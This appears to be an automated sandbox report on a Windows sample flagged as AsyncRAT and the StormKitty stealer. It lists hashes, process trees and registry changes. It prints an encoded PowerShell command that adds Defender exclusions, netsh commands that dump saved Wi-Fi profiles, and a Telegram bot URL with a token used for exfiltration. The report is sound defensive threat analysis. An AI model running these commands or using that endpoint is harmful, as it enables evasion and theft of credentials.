Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows7_x64 -
resource
win7-20230712-en -
resource tags
arch:x64arch:x86image:win7-20230712-enlocale:en-usos:windows7-x64system -
submitted
13-08-2023 09:50
Static task
static1
Behavioral task
behavioral1
Sample
69a281695cfceb02aec31b7ecc8105a60d606b2fc168ab32964380cd5fa79827_JC.exe
Resource
win7-20230712-en
General
-
Target
69a281695cfceb02aec31b7ecc8105a60d606b2fc168ab32964380cd5fa79827_JC.exe
-
Size
24.0MB
-
MD5
fe7a215f58c846f671142227e0a71061
-
SHA1
f40c456ce9f674ee93d3ef691c1b3aec0c53156b
-
SHA256
69a281695cfceb02aec31b7ecc8105a60d606b2fc168ab32964380cd5fa79827
-
SHA512
ff7efbd82997f802339407e709f074277ea609ac1f30ba1d768c5daac4a4990b7a731361717874fe98d524e0a012333e8b45ea1f83a1cc793fd0a06d8296b1ae
-
SSDEEP
393216:VT4ER8LcdmjoDuUKQhgL9bH3x0PmFhpbgab/bKh17KfxRu7i4Kw5jnS01oufNTda:VT4ER0pjoNvhcX6u1blb/bEmZRGi4Lb5
Malware Config
Extracted
asyncrat
Default
127.0.0.1:6606
127.0.0.1:7707
127.0.0.1:8808
https://api.telegram.org/bot6085983475:AAG9ma6AdbwS2Vmvqb_xIeiP1vbivSAPlXU/sendMessage?chat_id=1829819531
AsyncMutex_6SI8OkPnk
-
delay
3
-
install
false
-
install_folder
%AppData%
Signatures
-
StormKitty
StormKitty is an open source info stealer written in C#.
-
StormKitty payload 3 IoCs
resource yara_rule behavioral1/files/0x000d000000012282-61.dat family_stormkitty behavioral1/files/0x000d000000012282-66.dat family_stormkitty behavioral1/memory/2708-85-0x0000000000350000-0x0000000000380000-memory.dmp family_stormkitty -
Async RAT payload 3 IoCs
resource yara_rule behavioral1/files/0x000d000000012282-61.dat asyncrat behavioral1/files/0x000d000000012282-66.dat asyncrat behavioral1/memory/2708-85-0x0000000000350000-0x0000000000380000-memory.dmp asyncrat -
Executes dropped EXE 2 IoCs
pid Process 2708 deneme.exe 2756 ngrok.exe -
Loads dropped DLL 3 IoCs
pid Process 2404 69a281695cfceb02aec31b7ecc8105a60d606b2fc168ab32964380cd5fa79827_JC.exe 2404 69a281695cfceb02aec31b7ecc8105a60d606b2fc168ab32964380cd5fa79827_JC.exe 2876 Process not Found -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops desktop.ini file(s) 8 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\6a705ff963b832d927acbcde07d8ffcc\Admin@NYBYVYTJ_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\desktop.ini deneme.exe File opened for modification C:\Users\Admin\AppData\Local\6a705ff963b832d927acbcde07d8ffcc\Admin@NYBYVYTJ_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\desktop.ini deneme.exe File created C:\Users\Admin\AppData\Local\6a705ff963b832d927acbcde07d8ffcc\Admin@NYBYVYTJ_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\desktop.ini deneme.exe File opened for modification C:\Users\Admin\AppData\Local\6a705ff963b832d927acbcde07d8ffcc\Admin@NYBYVYTJ_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\desktop.ini deneme.exe File created C:\Users\Admin\AppData\Local\6a705ff963b832d927acbcde07d8ffcc\Admin@NYBYVYTJ_en-US\Grabber\DRIVE-C\Users\Admin\Desktop\desktop.ini deneme.exe File opened for modification C:\Users\Admin\AppData\Local\6a705ff963b832d927acbcde07d8ffcc\Admin@NYBYVYTJ_en-US\Grabber\DRIVE-C\Users\Admin\Desktop\desktop.ini deneme.exe File created C:\Users\Admin\AppData\Local\6a705ff963b832d927acbcde07d8ffcc\Admin@NYBYVYTJ_en-US\Grabber\DRIVE-C\Users\Admin\Documents\desktop.ini deneme.exe File opened for modification C:\Users\Admin\AppData\Local\6a705ff963b832d927acbcde07d8ffcc\Admin@NYBYVYTJ_en-US\Grabber\DRIVE-C\Users\Admin\Documents\desktop.ini deneme.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 4 icanhazip.com -
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 deneme.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 deneme.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 deneme.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 0f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c1320000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 deneme.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 1900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc41560858910090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000001e000000440053005400200052006f006f00740020004300410020005800330000000f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d20000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 deneme.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 deneme.exe -
Suspicious behavior: EnumeratesProcesses 8 IoCs
pid Process 2588 powershell.exe 2756 ngrok.exe 2756 ngrok.exe 2708 deneme.exe 2708 deneme.exe 2708 deneme.exe 2708 deneme.exe 2708 deneme.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2588 powershell.exe Token: SeDebugPrivilege 2708 deneme.exe -
Suspicious use of WriteProcessMemory 38 IoCs
description pid Process procid_target PID 2404 wrote to memory of 2588 2404 69a281695cfceb02aec31b7ecc8105a60d606b2fc168ab32964380cd5fa79827_JC.exe 30 PID 2404 wrote to memory of 2588 2404 69a281695cfceb02aec31b7ecc8105a60d606b2fc168ab32964380cd5fa79827_JC.exe 30 PID 2404 wrote to memory of 2588 2404 69a281695cfceb02aec31b7ecc8105a60d606b2fc168ab32964380cd5fa79827_JC.exe 30 PID 2404 wrote to memory of 2708 2404 69a281695cfceb02aec31b7ecc8105a60d606b2fc168ab32964380cd5fa79827_JC.exe 32 PID 2404 wrote to memory of 2708 2404 69a281695cfceb02aec31b7ecc8105a60d606b2fc168ab32964380cd5fa79827_JC.exe 32 PID 2404 wrote to memory of 2708 2404 69a281695cfceb02aec31b7ecc8105a60d606b2fc168ab32964380cd5fa79827_JC.exe 32 PID 2404 wrote to memory of 2708 2404 69a281695cfceb02aec31b7ecc8105a60d606b2fc168ab32964380cd5fa79827_JC.exe 32 PID 2404 wrote to memory of 2756 2404 69a281695cfceb02aec31b7ecc8105a60d606b2fc168ab32964380cd5fa79827_JC.exe 33 PID 2404 wrote to memory of 2756 2404 69a281695cfceb02aec31b7ecc8105a60d606b2fc168ab32964380cd5fa79827_JC.exe 33 PID 2404 wrote to memory of 2756 2404 69a281695cfceb02aec31b7ecc8105a60d606b2fc168ab32964380cd5fa79827_JC.exe 33 PID 2708 wrote to memory of 896 2708 deneme.exe 36 PID 2708 wrote to memory of 896 2708 deneme.exe 36 PID 2708 wrote to memory of 896 2708 deneme.exe 36 PID 2708 wrote to memory of 896 2708 deneme.exe 36 PID 896 wrote to memory of 2924 896 cmd.exe 38 PID 896 wrote to memory of 2924 896 cmd.exe 38 PID 896 wrote to memory of 2924 896 cmd.exe 38 PID 896 wrote to memory of 2924 896 cmd.exe 38 PID 896 wrote to memory of 2948 896 cmd.exe 39 PID 896 wrote to memory of 2948 896 cmd.exe 39 PID 896 wrote to memory of 2948 896 cmd.exe 39 PID 896 wrote to memory of 2948 896 cmd.exe 39 PID 896 wrote to memory of 2956 896 cmd.exe 40 PID 896 wrote to memory of 2956 896 cmd.exe 40 PID 896 wrote to memory of 2956 896 cmd.exe 40 PID 896 wrote to memory of 2956 896 cmd.exe 40 PID 2708 wrote to memory of 2964 2708 deneme.exe 41 PID 2708 wrote to memory of 2964 2708 deneme.exe 41 PID 2708 wrote to memory of 2964 2708 deneme.exe 41 PID 2708 wrote to memory of 2964 2708 deneme.exe 41 PID 2964 wrote to memory of 2932 2964 cmd.exe 43 PID 2964 wrote to memory of 2932 2964 cmd.exe 43 PID 2964 wrote to memory of 2932 2964 cmd.exe 43 PID 2964 wrote to memory of 2932 2964 cmd.exe 43 PID 2964 wrote to memory of 1036 2964 cmd.exe 44 PID 2964 wrote to memory of 1036 2964 cmd.exe 44 PID 2964 wrote to memory of 1036 2964 cmd.exe 44 PID 2964 wrote to memory of 1036 2964 cmd.exe 44
Processes
-
C:\Users\Admin\AppData\Local\Temp\69a281695cfceb02aec31b7ecc8105a60d606b2fc168ab32964380cd5fa79827_JC.exe"C:\Users\Admin\AppData\Local\Temp\69a281695cfceb02aec31b7ecc8105a60d606b2fc168ab32964380cd5fa79827_JC.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2404 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAYgBmACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAdQBiACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHAAbgBsACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAegBhACMAPgA="2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2588
-
-
C:\Users\Admin\AppData\Local\Temp\deneme.exe"C:\Users\Admin\AppData\Local\Temp\deneme.exe"2⤵
- Executes dropped EXE
- Drops desktop.ini file(s)
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2708 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All3⤵
- Suspicious use of WriteProcessMemory
PID:896 -
C:\Windows\SysWOW64\chcp.comchcp 650014⤵PID:2924
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show profile4⤵PID:2948
-
-
C:\Windows\SysWOW64\findstr.exefindstr All4⤵PID:2956
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid3⤵
- Suspicious use of WriteProcessMemory
PID:2964 -
C:\Windows\SysWOW64\chcp.comchcp 650014⤵PID:2932
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show networks mode=bssid4⤵PID:1036
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\ngrok.exe"C:\Users\Admin\AppData\Local\Temp\ngrok.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2756
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize304B
MD5110500207a3b309a629c75b6299132ea
SHA1ac88649cfdac4e88ca7219c466654fb6276204fe
SHA2566440dfe55c5e60c3c09923fb6734df1b68104ac03dc7a8d30324c88fce64f9ae
SHA512e74cb4c63241a13abff1b2ce2dc5bfb5863cc3338872ee6e8faeb5e5551ca04df704d8f1ae94acf313c9e3279cc29c8a2ceb8254cf6d9c4e46c075cb6d399f92
-
Filesize
1B
MD5cfcd208495d565ef66e7dff9f98764da
SHA1b6589fc6ab0dc82cf12099d1c2d40ab994e8410c
SHA2565feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9
SHA51231bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99
-
Filesize
62KB
MD53ac860860707baaf32469fa7cc7c0192
SHA1c33c2acdaba0e6fa41fd2f00f186804722477639
SHA256d015145d551ecd14916270efad773bbc9fd57fad2228d2c24559f696c961d904
SHA512d62ad2408c969a95550fb87efda50f988770ba5e39972041bf85924275baf156b8bec309ecc6409e5acdd37ec175dea40eff921ab58933b5b5b5d35a6147567c
-
Filesize
164KB
MD54ff65ad929cd9a367680e0e5b1c08166
SHA1c0af0d4396bd1f15c45f39d3b849ba444233b3a2
SHA256c8733c93cc5aaf5ca206d06af22ee8dbdec764fb5085019a6a9181feb9dfdee6
SHA512f530dc0d024a5a3b8903ffaaa41b608a5ccdd6da4ba1949f2c2e55a9fca475fec5c8d2119b5763cabe7ef1c3788fb9dcac621869db51d65b1d83cfe404fb4c27
-
Filesize
170KB
MD5958062458cd994df325348bb9f8f9d11
SHA16d678d971f4239f9304a3a6ac9941b9d7de1ba27
SHA256109f96c67f55689c41320f832134501ec02389a813eba1d990d192ab378ad533
SHA512e73c665f0cd3cc53ea4ca0ef50d196fce4783488759bd9f6b8d9cb842382e88327509a317dd328ddf7b7fc988cde06a46cd82fe2783165f75d5f812e231affff
-
Filesize
170KB
MD5958062458cd994df325348bb9f8f9d11
SHA16d678d971f4239f9304a3a6ac9941b9d7de1ba27
SHA256109f96c67f55689c41320f832134501ec02389a813eba1d990d192ab378ad533
SHA512e73c665f0cd3cc53ea4ca0ef50d196fce4783488759bd9f6b8d9cb842382e88327509a317dd328ddf7b7fc988cde06a46cd82fe2783165f75d5f812e231affff
-
Filesize
23.8MB
MD51c900bf7791f168639d27e19a90a9be7
SHA1ff6b857b8aaf8d9ed72ae300575aeb4ff21925db
SHA256b25a372ebb6692fbc2d3697467a7611dbbd521dd61ed995fa82c170c3ef50300
SHA512c0a96693031c56b4375478e7c15f41ef512b7eec72496e26dcb5dc688b13431852e2c30f98ef25a2d06df421e8c688b17fa603887ef3ae6980c6ee3789fe2988
-
Filesize
23.8MB
MD51c900bf7791f168639d27e19a90a9be7
SHA1ff6b857b8aaf8d9ed72ae300575aeb4ff21925db
SHA256b25a372ebb6692fbc2d3697467a7611dbbd521dd61ed995fa82c170c3ef50300
SHA512c0a96693031c56b4375478e7c15f41ef512b7eec72496e26dcb5dc688b13431852e2c30f98ef25a2d06df421e8c688b17fa603887ef3ae6980c6ee3789fe2988
-
Filesize
23.8MB
MD51c900bf7791f168639d27e19a90a9be7
SHA1ff6b857b8aaf8d9ed72ae300575aeb4ff21925db
SHA256b25a372ebb6692fbc2d3697467a7611dbbd521dd61ed995fa82c170c3ef50300
SHA512c0a96693031c56b4375478e7c15f41ef512b7eec72496e26dcb5dc688b13431852e2c30f98ef25a2d06df421e8c688b17fa603887ef3ae6980c6ee3789fe2988
-
Filesize
23.8MB
MD51c900bf7791f168639d27e19a90a9be7
SHA1ff6b857b8aaf8d9ed72ae300575aeb4ff21925db
SHA256b25a372ebb6692fbc2d3697467a7611dbbd521dd61ed995fa82c170c3ef50300
SHA512c0a96693031c56b4375478e7c15f41ef512b7eec72496e26dcb5dc688b13431852e2c30f98ef25a2d06df421e8c688b17fa603887ef3ae6980c6ee3789fe2988
-
Filesize
23.8MB
MD51c900bf7791f168639d27e19a90a9be7
SHA1ff6b857b8aaf8d9ed72ae300575aeb4ff21925db
SHA256b25a372ebb6692fbc2d3697467a7611dbbd521dd61ed995fa82c170c3ef50300
SHA512c0a96693031c56b4375478e7c15f41ef512b7eec72496e26dcb5dc688b13431852e2c30f98ef25a2d06df421e8c688b17fa603887ef3ae6980c6ee3789fe2988
-
Filesize
23.8MB
MD51c900bf7791f168639d27e19a90a9be7
SHA1ff6b857b8aaf8d9ed72ae300575aeb4ff21925db
SHA256b25a372ebb6692fbc2d3697467a7611dbbd521dd61ed995fa82c170c3ef50300
SHA512c0a96693031c56b4375478e7c15f41ef512b7eec72496e26dcb5dc688b13431852e2c30f98ef25a2d06df421e8c688b17fa603887ef3ae6980c6ee3789fe2988